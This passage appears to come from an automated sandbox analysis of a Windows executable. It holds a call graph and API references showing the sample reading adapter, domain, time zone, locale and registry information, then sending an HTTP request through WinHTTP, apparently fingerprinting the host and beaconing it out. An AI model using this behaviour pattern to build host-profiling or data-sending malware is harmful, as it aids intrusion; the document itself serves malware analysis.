3363->3365 3367 7ff6d5ca5973 _invalid_parameter_noinfo_noreturn 3363->3367 3366 7ff6d5ca9260 11 API calls 3364->3366 3368 7ff6d5cab180 _Receive_impl free 3365->3368 3369 7ff6d5ca5995 malloc memset 3366->3369 3367->3365 3368->3364 3370 7ff6d5ca6390 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3369->3370 3371 7ff6d5ca59ca GetAdaptersInfo 3370->3371 3372 7ff6d5ca59e9 GetAdaptersInfo 3371->3372 3373 7ff6d5ca59dd malloc 3371->3373 3374 7ff6d5ca59fa 3372->3374 3397 7ff6d5ca5a6c 3372->3397 3373->3372 3376 7ff6d5ca5a7c 3374->3376 3378 7ff6d5ca94e0 9 API calls 3374->3378 3374->3397 3375 7ff6d5ca5a73 free 3375->3376 3377 7ff6d5ca8760 8 API calls 3376->3377 3379 7ff6d5ca5a8d 3377->3379 3378->3374 3380 7ff6d5ca7790 _Receive_impl ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA _invalid_parameter_noinfo_noreturn free 3379->3380 3381 7ff6d5ca5ac5 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3380->3381 3382 7ff6d5ca7f40 11 API calls 3381->3382 3383 7ff6d5ca5aee 3382->3383 3384 7ff6d5ca5b2f 3383->3384 3386 7ff6d5ca5b2a 3383->3386 3388 7ff6d5ca5b23 _invalid_parameter_noinfo_noreturn 3383->3388 3385 7ff6d5ca4570 28 API calls 3384->3385 3387 7ff6d5ca5b38 3385->3387 3389 7ff6d5cab180 _Receive_impl free 3386->3389 3390 7ff6d5ca637f 3387->3390 3391 7ff6d5ca5b57 3387->3391 3388->3386 3389->3384 3393 7ff6d5ca1310 ?_Xlength_error@std@@YAXPEBD 3390->3393 3392 7ff6d5ca5c04 memcpy 3391->3392 3395 7ff6d5ca5b95 3391->3395 3399 7ff6d5ca5bde 3391->3399 3400 7ff6d5ca5bed 3391->3400 3394 7ff6d5ca9260 11 API calls 3392->3394 3396 7ff6d5ca6384 3393->3396 3398 7ff6d5ca5c57 3394->3398 3403 7ff6d5cab188 std::_Facet_Register __std_exception_copy malloc _CxxThrowException 3395->3403 3401 7ff6d5ca1270 Concurrency::cancel_current_task __std_exception_copy 3396->3401 3397->3375 3397->3376 3402 7ff6d5ca7f40 11 API calls 3398->3402 3399->3395 3399->3396 3406 7ff6d5ca5bae 3400->3406 3407 7ff6d5cab188 std::_Facet_Register __std_exception_copy malloc _CxxThrowException 3400->3407 3404 7ff6d5ca638a 3401->3404 3405 7ff6d5ca5c85 3402->3405 3403->3406 3408 7ff6d5ca5cc6 3405->3408 3411 7ff6d5ca5cc1 3405->3411 3415 7ff6d5ca5cba _invalid_parameter_noinfo_noreturn 3405->3415 3406->3392 3409 7ff6d5ca5cfb _invalid_parameter_noinfo_noreturn 3406->3409 3407->3406 3408->3409 3410 7ff6d5ca5d02 3408->3410 3412 7ff6d5ca5d07 3408->3412 3409->3410 3413 7ff6d5cab180 _Receive_impl free 3410->3413 3416 7ff6d5cab180 _Receive_impl free 3411->3416 3414 7ff6d5ca9260 11 API calls 3412->3414 3413->3412 3417 7ff6d5ca5d1d 3414->3417 3415->3411 3416->3408 3418 7ff6d5ca3a40 70 API calls 3417->3418 3419 7ff6d5ca5d27 3418->3419 3420 7ff6d5ca7f40 11 API calls 3419->3420 3421 7ff6d5ca5d34 3420->3421 3422 7ff6d5ca5d75 3421->3422 3424 7ff6d5ca5d70 3421->3424 3426 7ff6d5ca5d69 _invalid_parameter_noinfo_noreturn 3421->3426 3423 7ff6d5ca9260 11 API calls 3422->3423 3425 7ff6d5ca5d8b memset 3423->3425 3427 7ff6d5cab180 _Receive_impl free 3424->3427 3428 7ff6d5ca6390 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3425->3428 3426->3424 3427->3422 3429 7ff6d5ca5db0 NetGetJoinInformation 3428->3429 3430 7ff6d5ca5e77 3429->3430 3431 7ff6d5ca5dca 3429->3431 3432 7ff6d5ca8760 8 API calls 3430->3432 3433 7ff6d5ca8830 40 API calls 3431->3433 3434 7ff6d5ca5e9b 3432->3434 3435 7ff6d5ca5df5 3433->3435 3436 7ff6d5ca7790 _Receive_impl ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA _invalid_parameter_noinfo_noreturn free 3434->3436 3437 7ff6d5ca94e0 9 API calls 3435->3437 3438 7ff6d5ca5ed3 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3436->3438 3439 7ff6d5ca5e09 3437->3439 3440 7ff6d5ca7f40 11 API calls 3438->3440 3441 7ff6d5caaed0 9 API calls 3439->3441 3442 7ff6d5ca5efc 3440->3442 3443 7ff6d5ca5e27 3441->3443 3444 7ff6d5ca5f3d GetTimeZoneInformation memset 3442->3444 3447 7ff6d5ca5f38 3442->3447 3451 7ff6d5ca5f31 _invalid_parameter_noinfo_noreturn 3442->3451 3446 7ff6d5ca94e0 9 API calls 3443->3446 3445 7ff6d5ca6390 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3444->3445 3449 7ff6d5ca5f64 3445->3449 3450 7ff6d5ca5e36 3446->3450 3448 7ff6d5cab180 _Receive_impl free 3447->3448 3448->3444 3453 7ff6d5ca8830 40 API calls 3449->3453 3450->3430 3452 7ff6d5ca5e72 3450->3452 3454 7ff6d5ca5e6b _invalid_parameter_noinfo_noreturn 3450->3454 3451->3447 3455 7ff6d5cab180 _Receive_impl free 3452->3455 3456 7ff6d5ca5f9c 3453->3456 3454->3452 3455->3430 3457 7ff6d5ca94e0 9 API calls 3456->3457 3458 7ff6d5ca5fad 3457->3458 3459 7ff6d5caaed0 9 API calls 3458->3459 3460 7ff6d5ca5fcb 3459->3460 3461 7ff6d5ca94e0 9 API calls 3460->3461 3462 7ff6d5ca5fda 3461->3462 3463 7ff6d5ca601b 3462->3463 3464 7ff6d5ca6016 3462->3464 3466 7ff6d5ca600f _invalid_parameter_noinfo_noreturn 3462->3466 3465 7ff6d5ca8760 8 API calls 3463->3465 3467 7ff6d5cab180 _Receive_impl free 3464->3467 3468 7ff6d5ca603c 3465->3468 3466->3464 3467->3463 3469 7ff6d5ca7790 _Receive_impl ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA _invalid_parameter_noinfo_noreturn free 3468->3469 3470 7ff6d5ca6065 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3469->3470 3471 7ff6d5ca7f40 11 API calls 3470->3471 3472 7ff6d5ca608b 3471->3472 3473 7ff6d5ca60cc memset 3472->3473 3475 7ff6d5ca60c7 3472->3475 3478 7ff6d5ca60c0 _invalid_parameter_noinfo_noreturn 3472->3478 3474 7ff6d5ca6390 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3473->3474 3477 7ff6d5ca60e6 GetModuleFileNameA 3474->3477 3476 7ff6d5cab180 _Receive_impl free 3475->3476 3476->3473 3479 7ff6d5ca94e0 9 API calls 3477->3479 3478->3475 3480 7ff6d5ca610c 3479->3480 3481 7ff6d5ca94e0 9 API calls 3480->3481 3482 7ff6d5ca611b 3481->3482 3483 7ff6d5ca94e0 9 API calls 3482->3483 3484 7ff6d5ca612a 3483->3484 3485 7ff6d5ca8760 8 API calls 3484->3485 3486 7ff6d5ca6138 3485->3486 3487 7ff6d5ca7790 _Receive_impl ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA _invalid_parameter_noinfo_noreturn free 3486->3487 3488 7ff6d5ca6161 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3487->3488 3489 7ff6d5ca7f40 11 API calls 3488->3489 3490 7ff6d5ca6187 3489->3490 3491 7ff6d5ca61c8 3490->3491 3492 7ff6d5ca61c3 3490->3492 3494 7ff6d5ca61bc _invalid_parameter_noinfo_noreturn 3490->3494 3493 7ff6d5ca9260 11 API calls 3491->3493 3495 7ff6d5cab180 _Receive_impl free 3492->3495 3496 7ff6d5ca61de 3493->3496 3494->3492 3495->3491 3497 7ff6d5ca3c40 42 API calls 3496->3497 3498 7ff6d5ca61e8 3497->3498 3499 7ff6d5ca7f40 11 API calls 3498->3499 3500 7ff6d5ca61f5 3499->3500 3501 7ff6d5ca6236 3500->3501 3503 7ff6d5ca6231 3500->3503 3506 7ff6d5ca622a _invalid_parameter_noinfo_noreturn 3500->3506 3502 7ff6d5ca4cb0 63 API calls 3501->3502 3505 7ff6d5ca624c 3502->3505 3504 7ff6d5cab180 _Receive_impl free 3503->3504 3504->3501 3507 7ff6d5ca1ac0 190 API calls 3505->3507 3506->3503 3508 7ff6d5ca626f 3507->3508 3509 7ff6d5ca62c0 3508->3509 3510 7ff6d5ca9cb0 _invalid_parameter_noinfo_noreturn free 3508->3510 3511 7ff6d5ca62ff 3509->3511 3512 7ff6d5ca62fa 3509->3512 3515 7ff6d5ca62f3 _invalid_parameter_noinfo_noreturn 3509->3515 3514 7ff6d5ca6285 3510->3514 3513 7ff6d5ca634d 3511->3513 3517 7ff6d5ca6348 3511->3517 3520 7ff6d5ca6341 _invalid_parameter_noinfo_noreturn 3511->3520 3516 7ff6d5cab180 _Receive_impl free 3512->3516 3519 7ff6d5cab160 Concurrency::cancel_current_task 8 API calls 3513->3519 3518 7ff6d5ca62b8 3514->3518 3522 7ff6d5ca62b1 _invalid_parameter_noinfo_noreturn 3514->3522 3515->3512 3516->3511 3521 7ff6d5cab180 _Receive_impl free 3517->3521 3523 7ff6d5cab180 _Receive_impl free 3518->3523 3524 7ff6d5ca635e 3519->3524 3520->3517 3521->3513 3522->3518 3523->3509 3525 7ff6d5cabc5c GetModuleHandleW 3524->3525 3526 7ff6d5cab6ff 3525->3526 3526->3284 3526->3294 3528 7ff6d5cabb32 3527->3528 3529 7ff6d5cabb40 memset RtlCaptureContext RtlLookupFunctionEntry 3528->3529 3530 7ff6d5cabbb6 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3529->3530 3531 7ff6d5cabb7a RtlVirtualUnwind 3529->3531 3532 7ff6d5cabc36 3530->3532 3531->3530 3532->3282 3534 7ff6d5ca92c2 3533->3534 3535 7ff6d5ca9283 memcpy 3533->3535 3653 7ff6d5caa360 3534->3653 3535->3299 3674 7ff6d5cac090 3539->3674 3543 7ff6d5ca429c RegOpenKeyExA 3544 7ff6d5ca42c8 RegGetValueA 3543->3544 3545 7ff6d5ca433b RegOpenKeyExA 3543->3545 3546 7ff6d5ca4328 RegCloseKey 3544->3546 3547 7ff6d5ca42fc 3544->3547 3548 7ff6d5ca43e1 RegOpenKeyExA 3545->3548 3549 7ff6d5ca4366 RegGetValueA 3545->3549 3546->3545 3550 7ff6d5ca94e0 9 API calls 3547->3550 3551 7ff6d5ca4410 RegGetValueA 3548->3551 3552 7ff6d5ca44f3 3548->3552 3553 7ff6d5ca439f 3549->3553 3554 7ff6d5ca43ce RegCloseKey 3549->3554 3556 7ff6d5ca430d 3550->3556 3557 7ff6d5ca4449 3551->3557 3558 7ff6d5ca4478 RegGetValueA 3551->3558 3555 7ff6d5ca8760 8 API calls 3552->3555 3559 7ff6d5ca94e0 9 API calls 3553->3559 3554->3548 3561 7ff6d5ca4500 3555->3561 3562 7ff6d5ca94e0 9 API calls 3556->3562 3563 7ff6d5ca94e0 9 API calls 3557->3563 3564 7ff6d5ca44b1 3558->3564 3565 7ff6d5ca44e0 RegCloseKey 3558->3565 3560 7ff6d5ca43b0 3559->3560 3566 7ff6d5ca94e0 9 API calls 3560->3566 3567 7ff6d5ca7790 _Receive_impl 3 API calls 3561->3567 3568 7ff6d5ca4319 3562->3568 3569 7ff6d5ca445a 3563->3569 3570 7ff6d5ca94e0 9 API calls 3564->3570 3565->3552 3572 7ff6d5ca43bf 3566->3572 3573 7ff6d5ca4535 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3567->3573 3574 7ff6d5ca94e0 9 API calls 3568->3574 3575 7ff6d5ca94e0 9 API calls 3569->3575 3571 7ff6d5ca44c2 3570->3571 3576 7ff6d5ca94e0 9 API calls 3571->3576 3577 7ff6d5ca94e0 9 API calls 3572->3577 3578 7ff6d5cab160 Concurrency::cancel_current_task 8 API calls 3573->3578 3574->3546 3579 7ff6d5ca4469 3575->3579 3580 7ff6d5ca44d1 3576->3580 3577->3554 3581 7ff6d5ca455b 3578->3581 3582 7ff6d5ca94e0 9 API calls 3579->3582 3583 7ff6d5ca94e0 9 API calls 3580->3583 3584 7ff6d5ca7f40 3581->3584 3582->3558 3583->3565 3585 7ff6d5ca7f57 3584->3585 3586 7ff6d5ca7fb3 3585->3586 3587 7ff6d5ca7f71 memcpy 3585->3587 3589 7ff6d5caa360 10 API calls 3586->3589 3587->3303 3590 7ff6d5ca7fc3 3589->3590 3590->3303 3592 7ff6d5ca3ecf 3591->3592 3593 7ff6d5ca3ef2 3591->3593 3677 7ff6d5ca9bb0 3592->3677 3596 7ff6d5ca9bb0 7 API calls 3593->3596 3595 7ff6d5ca3eed 3597 7ff6d5cab160 Concurrency::cancel_current_task 8 API calls 3595->3597 3598 7ff6d5ca3f27 GetLocaleInfoA 3596->3598 3599 7ff6d5ca3fbb 3597->3599 3600 7ff6d5ca3fd4 3598->3600 3601 7ff6d5ca3f4d 3598->3601 3599->3312 3603 7ff6d5ca9bb0 7 API calls 3600->3603 3602 7ff6d5ca9bb0 7 API calls 3601->3602 3604 7ff6d5ca3f6b 3602->3604 3605 7ff6d5ca4001 memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3603->3605 3604->3595 3606 7ff6d5ca3fa4 3604->3606 3607 7ff6d5ca41e0 _invalid_parameter_noinfo_noreturn 3604->3607 3609 7ff6d5ca94e0 9 API calls 3605->3609 3608 7ff6d5cab180 _Receive_impl free 3606->3608 3608->3595 3610 7ff6d5ca40a5 3609->3610 3694 7ff6d5caaed0 3610->3694 3613 7ff6d5ca94e0 9 API calls 3614 7ff6d5ca40d2 3613->3614 3615 7ff6d5caaed0 9 API calls 3614->3615 3616 7ff6d5ca40f0 3615->3616 3617 7ff6d5ca94e0 9 API calls 3616->3617 3618 7ff6d5ca40ff 3617->3618 3619 7ff6d5ca8760 8 API calls 3618->3619 3620 7ff6d5ca410c 3619->3620 3621 7ff6d5ca7790 _Receive_impl 3 API calls 3620->3621 3622 7ff6d5ca4138 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3621->3622 3622->3604 3623 7ff6d5ca4158 3622->3623 3624 7ff6d5ca4188 3623->3624 3625 7ff6d5ca4181 _invalid_parameter_noinfo_noreturn 3623->3625 3626 7ff6d5cab180 _Receive_impl free 3624->3626 3625->3624 3626->3604 3627->3321 3631 7ff6d5ca9510 ?good@ios_base@std@ 3628->3631 3630 7ff6d5ca9563 3634 7ff6d5ca9579 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 3630->3634 3635 7ff6d5ca9591 3630->3635 3631->3630 3631->3635 3633 7ff6d5ca95eb ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 3636 7ff6d5ca959b ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3633->3636 3637 7ff6d5ca9608 3633->3637 3634->3635 3635->3633 3635->3636 3640 7ff6d5ca95c5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3635->3640 3638 7ff6d5ca56d7 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G 3636->3638 3639 7ff6d5ca9675 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3636->3639 3637->3636 3641 7ff6d5ca960d ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3637->3641 3638->3324 3639->3638 3640->3635 3640->3636 3641->3636 3641->3637 3644 7ff6d5ca879f 3642->3644 3643 7ff6d5ca881f 3643->3331 3644->3643 3645 7ff6d5ca87f6 memcpy 3644->3645 3646 7ff6d5ca8817 3644->3646 3645->3331 3709 7ff6d5caa6c0 3646->3709 3649 7ff6d5ca77ff ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 3648->3649 3651 7ff6d5ca77a9 3648->3651 3650 7ff6d5ca7840 _invalid_parameter_noinfo_noreturn 3649->3650 3651->3650 3652 7ff6d5cab180 _Receive_impl free 3651->3652 3652->3649 3654 7ff6d5caa38e 3653->3654 3655 7ff6d5caa4e2 3653->3655 3656 7ff6d5caa3ee 3654->3656 3659 7ff6d5caa3e1 3654->3659 3660 7ff6d5caa41a 3654->3660 3673 7ff6d5ca1310 ?_Xlength_error@std@@YAXPEBD 3655->3673 3661 7ff6d5cab188 std::_Facet_Register 3 API calls 3656->3661 3658 7ff6d5caa4e7 3662 7ff6d5ca1270 Concurrency::cancel_current_task __std_exception_copy 3658->3662 3659->3656 3659->3658 3663 7ff6d5caa403 3660->3663 3664 7ff6d5cab188 std::_Facet_Register 3 API calls 3660->3664 3661->3663 3665 7ff6d5caa4ed 3662->3665 3666 7ff6d5caa49b _invalid_parameter_noinfo_noreturn 3663->3666 3667 7ff6d5caa44e memcpy memcpy 3663->3667 3668 7ff6d5caa4a2 memcpy memcpy 3663->3668 3664->3663 3666->3668 3669 7ff6d5caa48e 3667->3669 3670 7ff6d5caa479 3667->3670 3671 7ff6d5ca92d5 3668->3671 3672 7ff6d5cab180 _Receive_impl free 3669->3672 3670->3666 3670->3669 3671->3299 3672->3671 3675 7ff6d5ca420d memset memset memset memset memset 3674->3675 3676 7ff6d5ca6390 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3675->3676 3676->3543 3678 7ff6d5ca9ca1 3677->3678 3679 7ff6d5ca9bd6 3677->3679 3708 7ff6d5ca1310 ?_Xlength_error@std@@YAXPEBD 3678->3708 3680 7ff6d5ca9be4 memcpy 3679->3680 3681 7ff6d5ca9bfc 3679->3681 3680->3595 3683 7ff6d5ca9c0d 3681->3683 3684 7ff6d5ca9ca6 3681->3684 3685 7ff6d5ca9c64 3681->3685 3687 7ff6d5cab188 std::_Facet_Register 3 API calls 3683->3687 3688 7ff6d5ca1270 Concurrency::cancel_current_task __std_exception_copy 3684->3688 3686 7ff6d5ca9c28 memcpy 3685->3686 3690 7ff6d5cab188 std::_Facet_Register 3 API calls 3685->3690 3686->3595 3692 7ff6d5ca9c23 3687->3692 3689 7ff6d5ca9cac 3688->3689 3690->3686 3692->3686 3693 7ff6d5ca9c5d _invalid_parameter_noinfo_noreturn 3692->3693 3693->3685 3695 7ff6d5caaf06 ?good@ios_base@std@ 3694->3695 3697 7ff6d5caaf3f 3695->3697 3698 7ff6d5caaf6d 3695->3698 3697->3698 3699 7ff6d5caaf55 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 3697->3699 3701 7ff6d5caafc7 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 3698->3701 3704 7ff6d5caaf9b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3698->3704 3706 7ff6d5caaf77 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3698->3706 3699->3698 3705 7ff6d5caafb7 3701->3705 3701->3706 3702 7ff6d5cab051 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3703 7ff6d5ca40c3 3702->3703 3703->3613 3704->3698 3704->3705 3705->3706 3707 7ff6d5caafe9 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3705->3707 3706->3702 3706->3703 3707->3705 3707->3706 3710 7ff6d5caa7e6 3709->3710 3713 7ff6d5caa6e7 3709->3713 3727 7ff6d5ca1310 ?_Xlength_error@std@@YAXPEBD 3710->3727 3712 7ff6d5caa7eb 3714 7ff6d5ca1270 Concurrency::cancel_current_task __std_exception_copy 3712->3714 3713->3712 3715 7ff6d5caa736 3713->3715 3716 7ff6d5caa7f1 3714->3716 3717 7ff6d5cab188 std::_Facet_Register 3 API calls 3715->3717 3726 7ff6d5caa853 3716->3726 3728 7ff6d5ca9cb0 3716->3728 3718 7ff6d5caa74b memcpy 3717->3718 3722 7ff6d5caa7c4 3718->3722 3724 7ff6d5caa797 3718->3724 3722->3643 3723 7ff6d5cab180 _Receive_impl free 3723->3726 3725 7ff6d5cab180 _Receive_impl free 3724->3725 3725->3722 3726->3643 3729 7ff6d5ca9d23 3728->3729 3730 7ff6d5ca9cb5 3728->3730 3729->3723 3730->3729 3731 7ff6d5ca9d33 _invalid_parameter_noinfo_noreturn 3730->3731 3732 7ff6d5cab180 _Receive_impl free 3730->3732 3732->3730 4017 7ff6d5cac75e ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA 4018 7ff6d5ca6660 4019 7ff6d5ca6696 4018->4019 4025 7ff6d5ca66b5 4018->4025 4020 7ff6d5ca8470 10 API calls 4019->4020 4021 7ff6d5ca669b 4020->4021 4023 7ff6d5ca669f fsetpos 4021->4023 4021->4025 4022 7ff6d5cab160 Concurrency::cancel_current_task 8 API calls 4024 7ff6d5ca672b 4022->4024 4023->4025 4025->4022 4026 7ff6d5ca6560 4027 7ff6d5ca6583 4026->4027 4028 7ff6d5ca659f setvbuf 4027->4028 4029 7ff6d5ca661d 4027->4029 4028->4029 4030 7ff6d5ca65ad ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 4028->4030 4032 7ff6d5cab160 Concurrency::cancel_current_task 8 API calls 4029->4032 4030->4029 4031 7ff6d5ca65cf _get_stream_buffer_pointers 4030->4031 4031->4029 4033 7ff6d5ca664c 4032->4033 4034 7ff6d5ca9464 4035 7ff6d5ca9472 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 4034->4035 4036 7ff6d5ca94a2 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 4035->4036 4037 7ff6d5ca94ac 4035->4037 4036->4037 3867 7ff6d5cab4dc 3868 7ff6d5cab4fe 3867->3868 3869 7ff6d5cab4f4 3867->3869 3870 7ff6d5cab180 _Receive_impl free 3869->3870 3870->3868
              APIs
                • Part of subcall function 00007FF6D5CA1520: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6D5CA157D
                • Part of subcall function 00007FF6D5CA1520: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF6D5CA159C
                • Part of subcall function 00007FF6D5CA1520: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6D5CA15D0
                • Part of subcall function 00007FF6D5CA1520: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF6D5CA1607
                • Part of subcall function 00007FF6D5CA1520: isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6D5CA1639
                • Part of subcall function 00007FF6D5CA1520: ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140 ref: 00007FF6D5CA165E
                • Part of subcall function 00007FF6D5CA1520: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF6D5CA168C
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA1BCC
              • memcpy.VCRUNTIME140 ref: 00007FF6D5CA1C1D
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA1D1F
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA1D70
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA1DC1
              • WinHttpOpen.WINHTTP ref: 00007FF6D5CA1DF4
              • WinHttpConnect.WINHTTP ref: 00007FF6D5CA1E30
              • WinHttpOpenRequest.WINHTTP ref: 00007FF6D5CA1E8D
              • memcpy.VCRUNTIME140 ref: 00007FF6D5CA1FE6
              • GetFileAttributesW.KERNELBASE ref: 00007FF6D5CA21C4
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6D5CA2214
              • memcpy.VCRUNTIME140 ref: 00007FF6D5CA2258
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6D5CA25AE
              • memcpy.VCRUNTIME140 ref: 00007FF6D5CA26E6
              • memcmp.VCRUNTIME140 ref: 00007FF6D5CA277E
              • memcpy.VCRUNTIME140 ref: 00007FF6D5CA2DD9
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA3214
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA321B
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA3222
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA3229
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA3230
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA3237
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA323E
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA3245
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA324C
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA3253
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA325A
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA3261
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA3268
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA326F
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA3276
              • memcpy.VCRUNTIME140 ref: 00007FF6D5CA29A8
                • Part of subcall function 00007FF6D5CAB188: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D5CAB1B8
                • Part of subcall function 00007FF6D5CAB188: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D5CAB1BE
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6D5CA3209
              • memcpy.VCRUNTIME140 ref: 00007FF6D5CA210C
                • Part of subcall function 00007FF6D5CAB188: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6D5CA1079), ref: 00007FF6D5CAB1A2
              • memcpy.VCRUNTIME140 ref: 00007FF6D5CA32D2
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6D5CA3329
              • WinHttpSendRequest.WINHTTP ref: 00007FF6D5CA3375
              • WinHttpReceiveResponse.WINHTTP ref: 00007FF6D5CA3388
